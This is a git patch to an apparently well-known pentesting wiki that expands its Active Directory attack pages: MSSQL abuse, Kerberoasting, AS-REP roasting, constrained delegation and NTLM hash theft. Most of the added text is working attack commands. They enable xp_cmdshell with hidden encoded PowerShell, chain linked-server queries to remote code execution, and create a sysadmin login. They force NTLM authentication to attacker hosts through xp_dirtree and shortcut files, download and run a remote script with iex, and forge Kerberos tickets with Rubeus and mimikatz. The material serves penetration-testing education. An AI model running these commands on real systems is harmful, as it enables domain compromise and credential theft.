From b340d48881b8b6fe28d67b884e879c18606927fe Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 15 Aug 2022 13:00:19 +0000 Subject: [PATCH] GitBook: [#3389] No subject --- SUMMARY.md | 2 +- .../pentesting-mssql-microsoft-sql-server.md | 19 +-- .../active-directory-methodology/README.md | 6 +- ...l-trusted-links.md => abusing-ad-mssql.md} | 138 +++++++++++++++--- .../asreproast.md | 6 +- .../constrained-delegation.md | 79 +++++++--- .../kerberoast.md | 24 +-- .../printers-spooler-service-abuse.md | 6 + .../ntlm/places-to-steal-ntlm-creds.md | 8 +- .../dpapi-extracting-passwords.md | 2 +- 10 files changed, 209 insertions(+), 81 deletions(-) rename windows-hardening/active-directory-methodology/{mssql-trusted-links.md => abusing-ad-mssql.md} (55%) diff --git a/SUMMARY.md b/SUMMARY.md index a157dc4b6..560ac794c 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -167,7 +167,7 @@ * [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md) * [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md) * [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md) - * [MSSQL Trusted Links](windows-hardening/active-directory-methodology/mssql-trusted-links.md) + * [MSSQL AD Abuse](windows-hardening/active-directory-methodology/abusing-ad-mssql.md) * [Over Pass the Hash/Pass the Key](windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md) * [Pass the Ticket](windows-hardening/active-directory-methodology/pass-the-ticket.md) * [Password Spraying](windows-hardening/active-directory-methodology/password-spraying.md) diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md index 7d276585c..12adec021 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md @@ -16,20 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -{% hint style="warning" %} -**Support HackTricks and get benefits!** - -Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -Discover **The PEASS Family**, our collection of exclusive **NFTs** - -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐊**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** -{% endhint %} - ## Basic Information **Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\ @@ -116,6 +102,9 @@ crackmapexec mssql -d -u -p -x "whoami" #Username + Hash + PS command crackmapexec mssql -d -u -H -X '$PSVersionTable' +# Check if xp_cmdshell is enabled +SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'; + #this turns on advanced options and is needed to configure xp_cmdshell sp_configure 'show advanced options', '1' RECONFIGURE @@ -142,7 +131,7 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ### Abusing MSSQL trusted Links -[**Read this post**](../windows-hardening/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature** +[**Read this post**](../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature** ### **Read files executing scripts (Python and R)** diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 7153b928f..b6b341862 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -204,12 +204,12 @@ This attack aims to **use the user NTLM hash to request Kerberos tickets**, as a This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the **ticket itself is stolen** and used to authenticate as its owner.\ [**More information about Pass the Ticket here**](pass-the-ticket.md)**.** -### MSSQL Trusted Links +### MSSQL Abuse & Trusted Links -If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\ +If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA), **steal** the NetNTLM **hash** or even perform a **relay** **attack**.\ Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.\ **The links between databases work even across forest trusts.**\ -[**More information about this technique here.**](mssql-trusted-links.md) +[**More information about this technique here.**](abusing-ad-mssql.md) ### Unconstrained Delegation diff --git a/windows-hardening/active-directory-methodology/mssql-trusted-links.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md similarity index 55% rename from windows-hardening/active-directory-methodology/mssql-trusted-links.md rename to windows-hardening/active-directory-methodology/abusing-ad-mssql.md index bd56f7187..e6d9e3298 100644 --- a/windows-hardening/active-directory-methodology/mssql-trusted-links.md +++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md @@ -1,4 +1,4 @@ -# MSSQL Trusted Links +# MSSQL AD Abuse
@@ -16,19 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## MSSQL Trusted Links +## **MSSQL Enumeration / Discovery** -If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\ -Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands. +The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case. -**The links between databases work even across forest trusts.** - -### **Powershell** - -```bash +```powershell Import-Module .\PowerupSQL.psd1 +``` -#Get local MSSQL instance (if any) +### Enumerating from the network without domain session + +```powershell +# Get local MSSQL instance (if any) Get-SQLInstanceLocal Get-SQLInstanceLocal | Get-SQLServerInfo @@ -39,8 +38,15 @@ Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads #If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them #The discovered MSSQL servers must be on the file: C:\temp\instances.txt Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test +``` + +### Enumerating from inside the domain + +```powershell +# Get local MSSQL instance (if any) +Get-SQLInstanceLocal +Get-SQLInstanceLocal | Get-SQLServerInfo -# FROM INSIDE OF THE DOMAIN #Get info about valid MSQL instances running in domain #This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance) Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose @@ -51,9 +57,71 @@ Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose #Try to connect and obtain info from each MSSQL server (also useful to check conectivity) Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose +# Get DBs, test connections and get info in oneliner +Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo +``` + +## MSSQL Basic Abuse + +### Access DB + +```powershell +#Perform a SQL query +Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername" + #Dump an instance (a lotof CVSs generated in current dir) Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql" +``` +### MSSQL xp\_dirtree abuse + +Executing something such as `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` will make the MSSQL server to **login** to the specified **IP address**. + +### Steal NetNTLM hash / Relay attack + +Using **`xp_dirtree`** it's possible to **force** a NTLM **authentication**, therefore it's possible to **steal** the NetNTLM **hash** or even perform a **relay attack**. + +Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\ +You can see how to use these tools in: + +{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} +[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +{% endcontent-ref %} + +### MSSQL RCE + +It might be also possible to **execute commands** inside the MSSQL host + +```powershell +Invoke-SQLOSCmd -Instance "srv-1.dev.cyberbotic.io,1433" -Command "whoami" -RawResults +# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary +``` + +If **manually** you could just use: + +
#To enumerate the current state of xp_cmdshell
+SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
+# A value of 0 shows that xp_cmdshell is disabled. To enable it:
+sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
+# Execute
+EXEC xp_cmdshell 'whoami';
+EXEC xp_cmdshell 'powershell -w hidden -enc <blah>';
+ +### MSSQL Extra + +{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md" %} +[pentesting-mssql-microsoft-sql-server.md](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md) +{% endcontent-ref %} + +## MSSQL Trusted Links + +If a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands. + +**The links between databases work even across forest trusts.** + +### Powershell Abuse + +```powershell #Look for MSSQL links of an accessible instance Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0 @@ -90,35 +158,51 @@ Notice that metasploit will try to abuse only the `openquery()` function in MSSQ ### Manual - Openquery() -From Linux you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py** and run queries like: +From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py.** -```bash -select * from openquery("DOMINIO\SERVER1",'select * from openquery("DOMINIO\SERVER2",''select * from master..sysservers'')') -``` - -From Windows you could also find the links and execute commands manually using a MSSQL client like [HeidiSQL](https://www.heidisql.com) +From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL**](https://www.heidisql.com)**** _Login using Windows authentication:_ ![](<../../.gitbook/assets/image (167) (1).png>) -_Find links inside the accessible MSSQL server (in this case the link is to dcorp-sql1):_\ -\_\_`select * from master..sysservers` +#### Find Trustable Links + +```sql +select * from master..sysservers +``` ![](<../../.gitbook/assets/image (168).png>) -Execute queries through the link (example: find more links in the new accessible instance):\ -`select * from openquery("dcorp-sql1", 'select * from master..sysservers')` +#### Execute queries in trustable link + +Execute queries through the link (example: find more links in the new accessible instance): + +```sql +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +``` + +{% hint style="warning" %} +Check where double and single quotes are used, it's important to use them that way. +{% endhint %} ![](<../../.gitbook/assets/image (169).png>) You can continue these trusted links chain forever manually. -Some times you won't be able to perform actions like `exec xp_cmdshell` from `openquery()` in those cases it might be worth it to test the following method: +```sql +# First level RCE +SELECT * FROM OPENQUERY("", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''') + +# Second level RCE +SELECT * FROM OPENQUERY("", 'select * from openquery("", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')') +``` + +If you cannot perform actions like `exec xp_cmdshell` from `openquery()` try with the `EXECUTE` method. ### Manual - EXECUTE -You can also abuse trusted links using EXECUTE: +You can also abuse trusted links using `EXECUTE`: ```bash #Create user and give admin privileges @@ -126,6 +210,14 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" ``` +## Local Privilege Escalation + +The **MSSQL local user** usually has a special type of privilege called **`SeImpersonatePrivilege`**. This allows the account to "impersonate a client after authentication". + +A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue or man-in-the-middle service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it's trying to authenticate. + +[SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command. +
Support HackTricks and get benefits! diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md index aefee3609..86d9f8afc 100644 --- a/windows-hardening/active-directory-methodology/asreproast.md +++ b/windows-hardening/active-directory-methodology/asreproast.md @@ -50,11 +50,15 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc {% code title="Using Windows" %} ```bash -.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast +.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username] Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast) ``` {% endcode %} +{% hint style="warning" %} +AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0. +{% endhint %} + ### Cracking ``` diff --git a/windows-hardening/active-directory-methodology/constrained-delegation.md b/windows-hardening/active-directory-methodology/constrained-delegation.md index c46a2a0ce..dbcc208cf 100644 --- a/windows-hardening/active-directory-methodology/constrained-delegation.md +++ b/windows-hardening/active-directory-methodology/constrained-delegation.md @@ -1,4 +1,4 @@ - +# Constrained Delegation
@@ -16,54 +16,88 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Constrained Delegation -# Constrained Delegation +Using this a Domain admin can **allow** a computer to **impersonate a user or computer** against a **service** of a machine. -Using this a Domain admin can allow 3rd parties to impersonate a user or computer against a service of a machine. - -* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user. +* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user. * **Service for User to Proxy(**_**S4U2proxy**_**):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one. **Note**: If a user is marked as ‘_Account is sensitive and cannot be delegated_ ’ in AD, you will **not be able to impersonate** them. -This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).\ -Also, you **won't only have access to the service that user is able to impersonate, but also to any service that uses the same account as the allowed one** (because the SPN is not being checked, only privileges). For example, if you have access to **CIFS service** you can also have access to **HOST service**.\ -Moreover, notice that if you have access to **LDAP service on DC**, you will have enough privileges to exploit a **DCSync**. +This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**). -{% code title="Enumerate from Powerview" %} +Moreover, you **won't only have access to the service that the user is able to impersonate, but also to any service** because the SPN (the service name requested) is not being checked, only privileges. Therefore, if you have access to **CIFS service** you can also have access to **HOST service** using `/altservice` flag in Rubeus. + +Also, **LDAP service access on DC**, is what is needed to exploit a **DCSync**. + +{% code title="Enumerate" %} ```bash +# Powerview Get-DomainUser -TrustedToAuth Get-DomainComputer -TrustedToAuth + +#ADSearch +ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json ``` {% endcode %} -{% code title="Using kekeo.exe + Mimikatz.exe" %} -```bash -#Obtain a TGT for the Constained allowed user +
# The first step is to get a TGT of the service taht can impersonate others
+## If you are SYSTEM in the server, you might take it from memory
+.\Rubeus.exe triage
+.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
+
+# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
+## Get AES/RC4 with mimikatz
+mimikatz sekurlsa::ekeys
+
+## Request with aes
+tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
+.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
+
+# Request with RC4
 tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
-#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
-tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
-#Load the TGS in memory
-Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'  
-```
-{% endcode %}
+.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
+ +{% hint style="warning" %} +There are **other ways to obtain a TGT ticket** or the **RC4** or **AES256** without being SYSTEM in the computer like the Printer Bug and unconstrain delegation, NTLM relaying and Active Directory Certificate Service abuse + +**Just having that TGT ticket (or hashed) you can perform this attack without compromising the whole computer.** +{% endhint %} {% code title="Using Rubeus" %} ```bash -#Obtain a TGT for the Constained allowed user -.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi #Obtain a TGS of the Administrator user to self .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator + #Obtain service TGS impersonating Administrator (CIFS) .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS + #Impersonate Administrator on different service (HOST) .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST + +# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2) +\.Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap + #Load ticket in memory .\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local ``` {% endcode %} -## Mitigation +{% code title="kekeo + Mimikatz" %} +```bash +#Obtain a TGT for the Constained allowed user +tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d + +#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP) +tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL + +#Load the TGS in memory +Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"' +``` +{% endcode %} + +### Mitigation * Disable kerberos delegation where possible * Limit DA/Admin logins to specific services @@ -71,7 +105,6 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp. [**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation) -
Support HackTricks and get benefits! @@ -87,5 +120,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md index b512a5ada..640171570 100644 --- a/windows-hardening/active-directory-methodology/kerberoast.md +++ b/windows-hardening/active-directory-methodology/kerberoast.md @@ -1,4 +1,4 @@ - +# Kerberoast
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# Kerberoast +## Kerberoast The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.\ You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**. @@ -50,14 +49,24 @@ Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current f {% code title="From Windows" %} ```bash +# Powerview Request-SPNTicket -SPN "" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local + +# Rubeus .\Rubeus.exe kerberoast /outfile:hashes.kerberoast +.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user + +# Invoke-Kerberoast iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast ``` {% endcode %} -## Cracking +{% hint style="warning" %} +When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated. +{% endhint %} + +### Cracking ``` john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast @@ -65,7 +74,7 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` -## Persistence +### Persistence If you have **enough permissions** over a user you can **make it kerberoastable**: @@ -77,7 +86,7 @@ You can find useful **tools** for **kerberoast** attacks here: [https://github.c If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate ` -## Mitigation +### Mitigation Kerberoast is very stealthy if exploitable @@ -98,7 +107,6 @@ Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{ **More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.** -
Support HackTricks and get benefits! @@ -114,5 +122,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index a77f7cb97..71333f811 100644 --- a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -81,6 +81,12 @@ If you are already inside the Windows machine you can force Windows to connect t C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\\file.txt ``` +### MSSQL + +```sql +EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1 +``` + ## HTML injection ### Via email diff --git a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md index 64f2bbc50..97a9256c8 100644 --- a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md +++ b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md @@ -237,7 +237,7 @@ IconIndex=1337 We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory. -``` +```powershell Set shl = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") currentFolder = shl.CurrentDirectory @@ -254,7 +254,7 @@ sc.Save The Powershell version. -``` +```powershell $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("StealMyHashes.lnk") $lnk.TargetPath = "\\35.164.153.224\@OsandaMalith" @@ -269,7 +269,7 @@ $lnk.Save() Another shortcut in Windows is the Internet shortcuts. You can save this as something.url -``` +```bash echo [InternetShortcut] > stealMyHashes.url echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url ``` @@ -301,7 +301,7 @@ Start-Process \\192.168.0.1\aa IE will resolve UNC paths. For example -``` +```html ``` diff --git a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md index 5e43105f4..b1d32a6bc 100644 --- a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md +++ b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md @@ -117,7 +117,7 @@ For where you can extract the master key with mimikatz: 
# If you know the users password
 dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /sid:S-1-5-21-2552734371-813931464-1050690807-1106 /password:123456 /protected
 
-# If you don't
+# If you don't have the users password and inside an AD
 dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /rpc
The master key of the file will appear in the output.